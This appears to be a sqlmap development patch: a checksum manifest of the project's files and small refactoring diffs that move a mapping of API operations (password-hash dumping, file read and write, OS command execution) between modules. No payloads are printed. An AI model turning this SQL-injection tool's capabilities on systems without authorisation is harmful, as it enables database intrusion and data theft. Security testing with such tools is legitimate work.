-b17ade3fe472b00f6d4d655f0d1036b2 udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ -3dfc42ea62f5db4196a1b736c603ef0f udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ -fe297bfe5e27e7f99d64b2d6baa766fe udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ -d7ce763983f5ef4cdae07480c7e16c36 udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ -f9e5d7a8f1fbd8df80d07f72ada0251b udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ -10a20abaf98ff25527702c7e37187427 udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ -0b5158292758f4a67cb1bdfcefcd4ef3 udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ -1d8eb0e3d38f1265ea1bef7f9ec60230 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ -1222dac08cf53e31e74e350a2c17452f udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ -27761c5e046da59f1f1e11f6d194e38a udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ -a6b9c964f7c7d7012f8f434bbd84a041 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ -d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ -ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ -0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ -336d0b0d2be333f5a6184042c85464fd waf/360.py -667cacdcd4ba650c9a436f081a79cd64 waf/airlock.py -7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py -b61329e8f8bdbf5625f9520ec010af1f waf/armor.py -dec64f18c23962d279cc1cde6469afed waf/asm.py -6ea7b4ff5f111acb0b24186ef82c3f2d waf/aws.py -ef722d062564def381b1f96f5faadee3 waf/baidu.py -07bc4b531d2353c9acfbfcada94ff12b waf/barracuda.py -82efee4639f7be75041c0145a6bc8578 waf/bigip.py -6a2834daf767491d3331bd31e946d540 waf/binarysec.py -41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py -2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py -ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py -21b8203fdaaaac3cb7c84fa4dc0627f6 waf/cloudflare.py -b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py -ac96f34c254951d301973617064eb1b5 waf/comodo.py -56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py -1538b661e35843074f4599be93b3fae9 waf/denyall.py -aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py -357cbc0a17a44e4f64062b799c718e0b waf/dotdefender.py -7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py -954bebd4a246d8b88794de00ccaecd3b waf/expressionengine.py -a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py -eb56ac34775cc3c5f721ec967d04b283 waf/generic.py -1c70655551b8296ceeb19292a342e620 waf/hyperguard.py -525483047474e6f15d9898b525bdafd3 waf/incapsula.py -1e5532ede194ac9c083891c2f02bca93 waf/__init__.py -30ae98958fb35061d9a4145cc74c0489 waf/isaserver.py -5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py -898f53c12133da3e946301f4aa97d538 waf/knownsec.py -81e6bf619c7bb73c4b62e2439e60e95a waf/kona.py -b17a154fe7959619eaafffa60e14199f waf/modsecurity.py -d09a50713daf3c0a2594ed4f50c57adb waf/naxsi.py -bf573d01d56e585f4ad57132bc594934 waf/netcontinuum.py -cb2f1516867684042f580e02138463de waf/netscaler.py -63b3cc819f432a32a403e24a00ab4d23 waf/newdefend.py -a925b2979c8e8aafb9e9a338ba4da6cf waf/nsfocus.py -ad7fe23004f8e0d02534c7baa877add3 waf/paloalto.py -856e34d47fedfe96039a6a7807f9605a waf/profense.py -166eb53544536e3e86223d513b8b688d waf/proventia.py -78a40eca7ddd14c4eaf911de7748b487 waf/radware.py -f5d53758d2008195609557112ce8e895 waf/requestvalidationmode.py -acb82b21f4032ceb510a58142add02ab waf/safe3.py -67cdf508e7b1f69ddf622a87e0e5e4e8 waf/safedog.py -d1b67820442199181815ec3fce27e582 waf/secureiis.py -34f0ec775835744bed601ef7c7a21c9d waf/senginx.py -1508a5200534b5273b66cecfd299e53e waf/sitelock.py -b088cf83c1a681d143e7eaea43f52b80 waf/sonicwall.py -4c412bc70007e6108d109e2911f2cefe waf/sophos.py -0e244e097a648158948dc8bb2351c781 waf/stingray.py -d5a5cef222f0e27f47bec3c4228e255e waf/sucuri.py -46224e3fa4b819da227c50fd45155823 waf/tencent.py -dffa9cebad777308714aaf83b71635b4 waf/teros.py -b37210459a13de40bf07722c4d032c33 waf/trafficshield.py -fe01932df9acea7f6d23f03c6b698646 waf/urlscan.py -a687449cd4e45f69e33b13d41e021480 waf/uspses.py -f3a81da13ee098e94edd965ea4b37b04 waf/varnish.py -20840afc269920826deac2b6c00d6b9c waf/wallarm.py -11205abf397ae9072adc3234b656ade9 waf/watchguard.py -9bf34539f382987490d2239d8ef0a651 waf/webappsecure.py -5b1eefdc39d449a74fce0564364b0e09 waf/webknight.py -11a5c6b10ced11e505a74e36ee2503b3 waf/wordfence.py -68e332530fab216d017ede506c3fec2f waf/yundun.py -bea35ba732ccc9548e6c4023cea6832b waf/yunsuo.py -705ac8663513c12150cb5623ef4a04fb waf/zenedge.py -dc394c5b90ada0a5d5853b5ad1f7d56d xml/banner/generic.xml -d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml -7b21aeb3ad66d7686eacd23a6346292c xml/banner/mysql.xml -9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml -c26cd4fa986ddc9f6d92dd87c8fc61cb xml/banner/postgresql.xml -4970709ca31bcaea5eb79547a132606a xml/banner/server.xml -d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml -58be20a3b29a9108d043786907700469 xml/banner/set-cookie.xml -d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml -350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml -817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml -0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml -a279656ea3fcb85c727249b02f828383 xml/livetests.xml -3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml -b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml -06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml -3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml -c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml -ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -a5eecbca03800851635817e0ca832a92 xml/queries.xml From 4badb546078e320cb224ad86e8682ec208978c5f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 20 Jun 2018 23:21:55 +0200 Subject: [PATCH 184/428] Couple of small patches --- lib/core/dicts.py | 29 +++ lib/core/enums.py | 28 --- lib/core/option.py | 8 +- lib/core/settings.py | 2 +- lib/utils/api.py | 5 +- txt/checksum.md5 | 477 +++++++++++++++++++++++++++++++++++++++++++ 6 files changed, 512 insertions(+), 37 deletions(-) create mode 100644 txt/checksum.md5 diff --git a/lib/core/dicts.py b/lib/core/dicts.py index a457b0262b5..de05a87bd6a 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -5,6 +5,7 @@ See the file 'LICENSE' for copying permission """ +from lib.core.enums import CONTENT_TYPE from lib.core.enums import DBMS from lib.core.enums import OS from lib.core.enums import POST_HINT @@ -294,3 +295,31 @@ OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"), OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout } + +PART_RUN_CONTENT_TYPES = { + "checkDbms": CONTENT_TYPE.TECHNIQUES, + "getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT, + "getBanner": CONTENT_TYPE.BANNER, + "getCurrentUser": CONTENT_TYPE.CURRENT_USER, + "getCurrentDb": CONTENT_TYPE.CURRENT_DB, + "getHostname": CONTENT_TYPE.HOSTNAME, + "isDba": CONTENT_TYPE.IS_DBA, + "getUsers": CONTENT_TYPE.USERS, + "getPasswordHashes": CONTENT_TYPE.PASSWORDS, + "getPrivileges": CONTENT_TYPE.PRIVILEGES, + "getRoles": CONTENT_TYPE.ROLES, + "getDbs": CONTENT_TYPE.DBS, + "getTables": CONTENT_TYPE.TABLES, + "getColumns": CONTENT_TYPE.COLUMNS, + "getSchema": CONTENT_TYPE.SCHEMA, + "getCount": CONTENT_TYPE.COUNT, + "dumpTable": CONTENT_TYPE.DUMP_TABLE, + "search": CONTENT_TYPE.SEARCH, + "sqlQuery": CONTENT_TYPE.SQL_QUERY, + "tableExists": CONTENT_TYPE.COMMON_TABLES, + "columnExists": CONTENT_TYPE.COMMON_COLUMNS, + "readFile": CONTENT_TYPE.FILE_READ, + "writeFile": CONTENT_TYPE.FILE_WRITE, + "osCmd": CONTENT_TYPE.OS_CMD, + "regRead": CONTENT_TYPE.REG_READ +} diff --git a/lib/core/enums.py b/lib/core/enums.py index a1a45007129..96fceee99d9 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -340,34 +340,6 @@ class CONTENT_TYPE: OS_CMD = 24 REG_READ = 25 -PART_RUN_CONTENT_TYPES = { - "checkDbms": CONTENT_TYPE.TECHNIQUES, - "getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT, - "getBanner": CONTENT_TYPE.BANNER, - "getCurrentUser": CONTENT_TYPE.CURRENT_USER, - "getCurrentDb": CONTENT_TYPE.CURRENT_DB, - "getHostname": CONTENT_TYPE.HOSTNAME, - "isDba": CONTENT_TYPE.IS_DBA, - "getUsers": CONTENT_TYPE.USERS, - "getPasswordHashes": CONTENT_TYPE.PASSWORDS, - "getPrivileges": CONTENT_TYPE.PRIVILEGES, - "getRoles": CONTENT_TYPE.ROLES, - "getDbs": CONTENT_TYPE.DBS, - "getTables": CONTENT_TYPE.TABLES, - "getColumns": CONTENT_TYPE.COLUMNS, - "getSchema": CONTENT_TYPE.SCHEMA, - "getCount": CONTENT_TYPE.COUNT, - "dumpTable": CONTENT_TYPE.DUMP_TABLE, - "search": CONTENT_TYPE.SEARCH, - "sqlQuery": CONTENT_TYPE.SQL_QUERY, - "tableExists": CONTENT_TYPE.COMMON_TABLES, - "columnExists": CONTENT_TYPE.COMMON_COLUMNS, - "readFile": CONTENT_TYPE.FILE_READ, - "writeFile": CONTENT_TYPE.FILE_WRITE, - "osCmd": CONTENT_TYPE.OS_CMD, - "regRead": CONTENT_TYPE.REG_READ -} - class CONTENT_STATUS: IN_PROGRESS = 0 COMPLETE = 1 diff --git a/lib/core/option.py b/lib/core/option.py index f9151e05c00..f0d0ed868f0 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -35,14 +35,11 @@ from lib.core.common import dataToStdout from lib.core.common import getPublicTypeMembers from lib.core.common import getSafeExString -from lib.core.common import extractRegexResult -from lib.core.common import filterStringValue from lib.core.common import findLocalPort from lib.core.common import findPageForms from lib.core.common import getConsoleWidth from lib.core.common import getFileItems from lib.core.common import getFileType -from lib.core.common import getUnicode from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import openFile @@ -307,7 +304,7 @@ def _setRequestFromFile(): conf.secondReq = safeExpandUser(conf.secondReq) if not os.path.isfile(conf.secondReq): - errMsg = "specified second-order HTTP request file '%s' " % onf.secondReq + errMsg = "specified second-order HTTP request file '%s' " % conf.secondReq errMsg += "does not exist" raise SqlmapFilePathException(errMsg) @@ -1624,6 +1621,9 @@ def _cleanupOptions(): if any((conf.proxy, conf.proxyFile, conf.tor)): conf.disablePrecon = True + if conf.dummy: + conf.batch = True + threadData = getCurrentThreadData() threadData.reset() diff --git a/lib/core/settings.py b/lib/core/settings.py index 28ae3253d0b..92f318a2391 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.33" +VERSION = "1.2.6.35" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/api.py b/lib/utils/api.py index 543aa75e96c..4d6316eeda4 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -33,10 +33,10 @@ from lib.core.data import logger from lib.core.datatype import AttribDict from lib.core.defaults import _defaults +from lib.core.dicts import PART_RUN_CONTENT_TYPES from lib.core.enums import AUTOCOMPLETE_TYPE from lib.core.enums import CONTENT_STATUS from lib.core.enums import MKSTEMP_PREFIX -from lib.core.enums import PART_RUN_CONTENT_TYPES from lib.core.exception import SqlmapConnectionException from lib.core.log import LOGGER_HANDLER from lib.core.optiondict import optDict @@ -45,9 +45,6 @@ from lib.core.settings import RESTAPI_DEFAULT_ADDRESS from lib.core.settings import RESTAPI_DEFAULT_PORT from lib.core.shell import autoCompletion -from lib.core.shell import clearHistory -from lib.core.shell import loadHistory -from lib.core.shell import saveHistory from lib.core.subprocessng import Popen from lib.parse.cmdline import cmdLineParser from thirdparty.bottle.bottle import error as return_error diff --git a/txt/checksum.md5 b/txt/checksum.md5 new file mode 100644 index 00000000000..5ddc8ad89b0 --- /dev/null +++ b/txt/checksum.md5 @@ -0,0 +1,477 @@ +4cb52d99ae953f04fb0f17825b0dabc4 extra/beep/beep.py +1e5532ede194ac9c083891c2f02bca93 extra/beep/__init__.py +b0eb597c613afeff9d62898cf4c67a56 extra/cloak/cloak.py +1e5532ede194ac9c083891c2f02bca93 extra/cloak/__init__.py +e0911386106b95d2ba4b12d651b2eb16 extra/dbgtool/dbgtool.py +1e5532ede194ac9c083891c2f02bca93 extra/dbgtool/__init__.py +acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_ +708e9fd35dabcbfcd10e91bbc14f091f extra/icmpsh/icmpsh_m.py +2d020d2bdcee1170805f48839fdb89df extra/icmpsh/__init__.py +1e5532ede194ac9c083891c2f02bca93 extra/__init__.py +fe141ec3178a46e7151c7f34bb747c68 extra/mssqlsig/update.py +ff90cb0366f7cefbdd6e573e27e6238c extra/runcmd/runcmd.exe_ +1e5532ede194ac9c083891c2f02bca93 extra/safe2bin/__init__.py +b6c0f2047e9bea90f4d5c5806c0f6a9a extra/safe2bin/safe2bin.py +d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_ +2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_ +c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_ +220745c50d375dad7aefebf8ca3611ef extra/shutils/duplicates.py +e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py +71b9d4357c31db013ecda27433830090 extra/shutils/pylint.py +1056d1112ba5130868178cb495d22b1d extra/shutils/regressiontest.py +1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py +b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py +0f581182871148b0456a691ae85b04c0 lib/controller/action.py +94872ce72dc2628cdedf2eb82cba716e lib/controller/checks.py +c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py +c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py +1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py +0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py +fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py +6165b8a826803b29c479d47a60e8dbf6 lib/core/common.py +0d082da16c388b3445e656e0760fb582 lib/core/convert.py +9f87391b6a3395f7f50830b391264f27 lib/core/data.py +72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py +4086fb55f42e27de5330505605baad0f lib/core/decorators.py +fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py +98b730cef6a59ab044a108276aef6f42 lib/core/dicts.py +9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py +ab3f4f3e3019add5f4a2e28f7e8748a4 lib/core/enums.py +cada93357a7321655927fc9625b3bfec lib/core/exception.py +1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py +458a194764805cd8312c14ecd4be4d1e lib/core/log.py +e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py +5d25911fbd379c32d5bf918c79febc0b lib/core/option.py +c8c386d644d57c659d74542f5f57f632 lib/core/patch.py +6783160150b4711d02c56ee2beadffdb lib/core/profiling.py +6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py +0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py +a7db43859b61569b601b97f187dd31c5 lib/core/revision.py +fcb74fcc9577523524659ec49e2e964b lib/core/session.py +4742105fe7dd3964e11961c44cf9e851 lib/core/settings.py +dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py +a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py +36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py +72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py +de9922a29c71a235cb95a916ff925db2 lib/core/threads.py +c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py +9d395b143be295a143eb5c9b926f3569 lib/core/update.py +e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py +1e5532ede194ac9c083891c2f02bca93 lib/__init__.py +7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py +2b3b021a8e7e119d0553c02b110d07d9 lib/parse/cmdline.py +fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py +3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py +6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py +1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py +1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py +f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py +492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py +30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py +2b81435f5a7519298c15c724e3194a0d lib/request/basic.py +c0cabedead14b8a23353b606672cff42 lib/request/comparison.py +1b5491cc079384f08cbc6b397786e1af lib/request/connect.py +dd4598675027fae99f2e2475b05986da lib/request/direct.py +2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py +98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py +1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py +c2fb1abbb7127ec6419bbf852c0a458d lib/request/inject.py +aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py +51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py +2c3774b72586985719035b195f144d7b lib/request/rangehandler.py +aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py +7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py +747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py +acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py +1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py +46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py +fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py +48575dde7bb867b7937769f569a98309 lib/takeover/udf.py +f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py +f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py +4a7f231e597f754e9fcd116d13ad1a4d lib/techniques/blind/inference.py +1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py +1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py +799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py +48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py +1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py +f5fb02487edaf9adaa81d54324c84f8f lib/techniques/error/use.py +1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py +1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py +94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py +11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py +77ff35587af9e3dfde63b8327e230f9a lib/utils/api.py +37dfb641358669f62c2acedff241348b lib/utils/brute.py +31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py +de9620f03231d8329ee8434884b6bacd lib/utils/deps.py +f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py +7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py +062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py +cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py +011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py +1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py +010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py +5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py +0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py +2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py +571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py +dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py +fad14adffa8b640a15b06db955031695 lib/utils/versioncheck.py +e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py +b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py +3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py +fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py +c2428c5c73d049abf4442ec1b9404a25 plugins/dbms/access/fingerprint.py +e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py +77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py +2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py +8df07c2805aceb7d6fb4add40de84795 plugins/dbms/db2/connector.py +4deeda463003ab71e7d2f34a263b5bbf plugins/dbms/db2/enumeration.py +da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py +b54dbf44590a5cbefb2b4f8e9a01a383 plugins/dbms/db2/fingerprint.py +95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py +82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py +25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py +53bd7de27d37958f543f5329362ac298 plugins/dbms/firebird/connector.py +bc4d71116d7296d63894484f2e60ade2 plugins/dbms/firebird/enumeration.py +c3ca81000200e5ab4210e9bf2e04ce93 plugins/dbms/firebird/filesystem.py +bd2159afbe83c70059f57712b4ae0189 plugins/dbms/firebird/fingerprint.py +d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py +c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py +1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py +271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py +95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py +616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py +b7d693a6f5f39fee0a65f2d7b0830c5e plugins/dbms/hsqldb/fingerprint.py +fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py +4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py +7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py +97dac442190bd4ffac3ba292e2abfd4c plugins/dbms/informix/connector.py +c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py +da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py +35eac2f3837a72940eb50753dc4566e5 plugins/dbms/informix/fingerprint.py +9dac94c8f76acf0be65b6c57ecdb5c34 plugins/dbms/informix/__init__.py +aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py +25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py +1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py +6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py +f33efaab1695dc9885ebae3f6072fffa plugins/dbms/maxdb/enumeration.py +ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py +9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py +4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py +e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py +bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py +decc645344bb93aca504a71ba2e4cad4 plugins/dbms/mssqlserver/connector.py +f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py +177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py +08914da79141713bd69a25c3cc7f06a8 plugins/dbms/mssqlserver/fingerprint.py +f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py +612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py +3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py +f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py +445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py +4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py +fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py +30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py +0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py +403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py +f772070dba85976a7894dac5046b93ea plugins/dbms/oracle/connector.py +e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py +c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py +538395c0e5ccb1b6befc17f129f45f29 plugins/dbms/oracle/fingerprint.py +9cbce3d3747c67f18e65f9c1eb910b0e plugins/dbms/oracle/__init__.py +5c2f1611c3ceface38a7e95650391ae6 plugins/dbms/oracle/syntax.py +bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py +f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py +7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py +c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py +29560cf78211888802c6e5c8681e7d71 plugins/dbms/postgresql/fingerprint.py +470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py +20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py +1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py +80a2083a4fb7809d310c3d5ecc94e3c5 plugins/dbms/sqlite/connector.py +5194556e6b1575b1349f8ccfd773952b plugins/dbms/sqlite/enumeration.py +90fa97b84998a01dba7cc8c3329a1223 plugins/dbms/sqlite/filesystem.py +ed52c198f3346ceabdef676e9f5d3c0f plugins/dbms/sqlite/fingerprint.py +f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py +964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py +3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py +9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py +426698152f63504061e5875e64957691 plugins/dbms/sybase/enumeration.py +74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py +c8ee0deaa2309e96d9a409ff1524f3ad plugins/dbms/sybase/fingerprint.py +a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py +36acb9a5966af21b32e8558b0d50653d plugins/dbms/sybase/syntax.py +79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py +34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py +e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py +156c227dbe765da3d0fd2976fbe18d8b plugins/generic/databases.py +4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py +d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py +0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py +f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py +1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py +f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py +b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py +a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py +e522c294676ede15bee751107e9bb449 plugins/generic/takeover.py 